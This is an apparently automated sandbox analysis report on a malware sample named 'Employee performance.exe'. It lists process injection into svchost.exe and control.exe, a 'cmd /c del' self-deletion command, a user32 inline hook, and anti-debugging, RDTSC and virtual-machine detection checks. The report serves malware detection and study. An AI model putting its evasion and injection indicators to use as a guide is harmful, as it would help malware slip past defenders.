Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Employee performance.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Employee performance.exe	ReversingLabs: Detection: 65%
Source: Employee performance.exe	Virustotal: Detection: 66%

Source: unknown	Process created: C:\Users\user\Desktop\Employee performance.exe "C:\Users\user\Desktop\Employee performance.exe"
Source: C:\Users\user\Desktop\Employee performance.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Employee performance.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Employee performance.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Employee performance.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Employee performance.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Employee performance.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Employee performance.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Employee performance.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Employee performance.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Employee performance.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Employee performance.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Employee performance.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Employee performance.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Employee performance.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Employee performance.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wscinterop.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wscapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: werconcpl.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: hcproviders.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: wininet.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32

Jump to behavior

Source: Employee performance.exe

Static file information: File size 1127424 > 1048576

Source: Employee performance.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Employee performance.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Employee performance.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Employee performance.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Employee performance.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Employee performance.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Employee performance.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: Employee performance.exe, 00000000.00000003.1242557919.0000000004030000.00000004.00001000.00020000.00000000.sdmp, Employee performance.exe, 00000000.00000003.1248529993.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1259397461.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1249766090.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1314965946.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1314965946.0000000003500000.00000040.00001000.00020000.00000000.sdmp, control.exe, 0000000A.00000003.1316733033.00000000050CB000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000A.00000003.1314684479.0000000004F13000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000A.00000002.3731557006.0000000005280000.00000040.00001000.00020000.00000000.sdmp, control.exe, 0000000A.00000002.3731557006.000000000541E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: control.pdb source: svchost.exe, 00000002.00000003.1314068152.0000000000E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1313976409.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, control.exe, control.exe, 0000000A.00000002.3716428734.0000000000900000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Employee performance.exe, 00000000.00000003.1242557919.0000000004030000.00000004.00001000.00020000.00000000.sdmp, Employee performance.exe, 00000000.00000003.1248529993.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1259397461.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1249766090.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1314965946.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1314965946.0000000003500000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 0000000A.00000003.1316733033.00000000050CB000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000A.00000003.1314684479.0000000004F13000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000A.00000002.3731557006.0000000005280000.00000040.00001000.00020000.00000000.sdmp, control.exe, 0000000A.00000002.3731557006.000000000541E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: control.pdbUGP source: svchost.exe, 00000002.00000003.1314068152.0000000000E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1313976409.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000A.00000002.3716428734.0000000000900000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.3741355604.000000001105F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000A.00000002.3723389125.000000000348C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000A.00000002.3732186608.00000000057CF000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.3741355604.000000001105F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000A.00000002.3723389125.000000000348C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000A.00000002.3732186608.00000000057CF000.00000004.10000000.00040000.00000000.sdmp

Source: Employee performance.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Employee performance.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Employee performance.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Employee performance.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Employee performance.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_00FD42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00FD42DE

Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00FF0A76 push ecx; ret	0_2_00FF0A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417857 push ss; retf	2_2_00417858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E971 push ebp; ret	2_2_0041E977
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A9D5 push ss; iretd	2_2_0041A9D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00404B32 push edx; retf	2_2_00404B35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041ABB6 pushfd ; ret	2_2_0041ABBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D4F2 push eax; ret	2_2_0041D4F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D4FB push eax; ret	2_2_0041D562
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D4A5 push eax; ret	2_2_0041D4F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D55C push eax; ret	2_2_0041D562
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040152B push es; iretd	2_2_0040152D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416618 push eax; iretd	2_2_00416634
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035309AD push ecx; mov dword ptr [esp], ecx	2_2_035309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347EB02 push esp; retn 0000h	2_2_0347EB03
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347EB1E push esp; retn 0000h	2_2_0347EB1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347E9B5 push esp; retn 0000h	2_2_0347EAE7
Source: C:\Windows\explorer.exe	Code function: 3_2_10C9B9B5 push esp; retn 0000h	3_2_10C9BAE7
Source: C:\Windows\explorer.exe	Code function: 3_2_10C9BB02 push esp; retn 0000h	3_2_10C9BB03
Source: C:\Windows\explorer.exe	Code function: 3_2_10C9BB1E push esp; retn 0000h	3_2_10C9BB1F
Source: C:\Windows\explorer.exe	Code function: 3_2_118BD9B5 push esp; retn 0000h	3_2_118BDAE7
Source: C:\Windows\explorer.exe	Code function: 3_2_118BDB02 push esp; retn 0000h	3_2_118BDB03
Source: C:\Windows\explorer.exe	Code function: 3_2_118BDB1E push esp; retn 0000h	3_2_118BDB1F
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0090486D push ecx; ret	10_2_00904880
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052827FA pushad ; ret	10_2_052827F9
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0528225F pushad ; ret	10_2_052827F9
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_052B09AD push ecx; mov dword ptr [esp], ecx	10_2_052B09B6
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_0528283D push eax; iretd	10_2_05282858
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_05281368 push eax; iretd	10_2_05281369
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_032F6618 push eax; iretd	10_2_032F6634
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_032E152B push es; iretd	10_2_032E152D
Source: C:\Windows\SysWOW64\control.exe	Code function: 10_2_032FD55C push eax; ret	10_2_032FD562

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE3

Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00FEF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00FEF98E
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_01061C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_01061C41

Source: C:\Users\user\Desktop\Employee performance.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Employee performance.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\Employee performance.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-96406

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Employee performance.exe	API/Special instruction interceptor: Address: F93264
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFB2CED0774
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFB2CECD8A4
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FFB2CED0774
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FFB2CECD8A4
Source: C:\Windows\SysWOW64\control.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 32E9904 second address: 32E990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 32E9B6E second address: 32E9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00409AA0 rdtsc

2_2_00409AA0

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1959	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 7979	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 868	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 876	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Window / User API: threadDelayed 624	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Window / User API: threadDelayed 9347	Jump to behavior

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Source: C:\Users\user\Desktop\Employee performance.exe	API coverage: 3.8 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 2.0 %
Source: C:\Windows\SysWOW64\control.exe	API coverage: 2.0 %

Source: C:\Windows\explorer.exe TID: 7456	Thread sleep count: 1959 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7456	Thread sleep time: -3918000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7456	Thread sleep count: 7979 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7456	Thread sleep time: -15958000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 7292	Thread sleep count: 624 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 7292	Thread sleep time: -1248000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 7292	Thread sleep count: 9347 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 7292	Thread sleep time: -18694000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_0103DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0103DBBE
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_0100C2A2 FindFirstFileExW,	0_2_0100C2A2
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_0104698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0104698F
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_010468EE FindFirstFileW,FindClose,	0_2_010468EE
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_0103D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0103D076
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_0103D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0103D3A9
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_0104979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0104979D
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_01049642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_01049642
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_01049B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_01049B2B
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_01045C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_01045C97

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_00FD42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00FD42DE

Source: explorer.exe, 00000003.00000002.3719950335.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
Source: explorer.exe, 00000003.00000000.1264664256.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000003.00000002.3735824051.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000003.00000002.3735824051.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076210055.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1268404306.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272651654.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000000.1264664256.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
Source: explorer.exe, 00000003.00000003.3074286541.0000000009013000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000003.00000000.1264664256.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
Source: explorer.exe, 00000003.00000000.1264664256.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000003.00000000.1265667852.0000000007306000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_xU1
Source: explorer.exe, 00000003.00000002.3735824051.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 00000003.00000000.1268404306.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
Source: explorer.exe, 00000003.00000003.2274623728.0000000008F7A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
Source: explorer.exe, 00000003.00000003.2272651654.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000000.1268404306.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076210055.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272651654.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3735824051.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
Source: explorer.exe, 00000003.00000000.1264664256.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware20,1
Source: explorer.exe, 00000003.00000000.1264664256.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: explorer.exe, 00000003.00000002.3735824051.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMWare
Source: explorer.exe, 00000003.00000000.1268404306.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
Source: explorer.exe, 00000003.00000000.1265667852.0000000007306000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000003.00000003.2272651654.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076210055.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3735824051.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1268404306.0000000008F27000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWT`
Source: explorer.exe, 00000003.00000000.1264664256.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIES1371
Source: explorer.exe, 00000003.00000000.1264664256.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM
Source: explorer.exe, 00000003.00000002.3719950335.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000003.00000000.1264664256.0000000003249000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: explorer.exe, 00000003.00000002.3735824051.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000002.3719950335.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00409AA0 rdtsc

2_2_00409AA0

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0040ACE0 LdrLoadDll,

2_2_0040ACE0

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_0104EAA2 BlockInput,

0_2_0104EAA2

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_01002622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_01002622

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_00FD42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00FD42DE

Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00FF4CE8 mov eax, dword ptr fs:[00000030h]	0_2_00FF4CE8
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00F934D0 mov eax, dword ptr fs:[00000030h]	0_2_00F934D0
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00F93530 mov eax, dword ptr fs:[00000030h]	0_2_00F93530
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_00F91E70 mov eax, dword ptr fs:[00000030h]	0_2_00F91E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]	2_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]	2_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]	2_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B035C mov ecx, dword ptr fs:[00000030h]	2_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]	2_2_035B035C
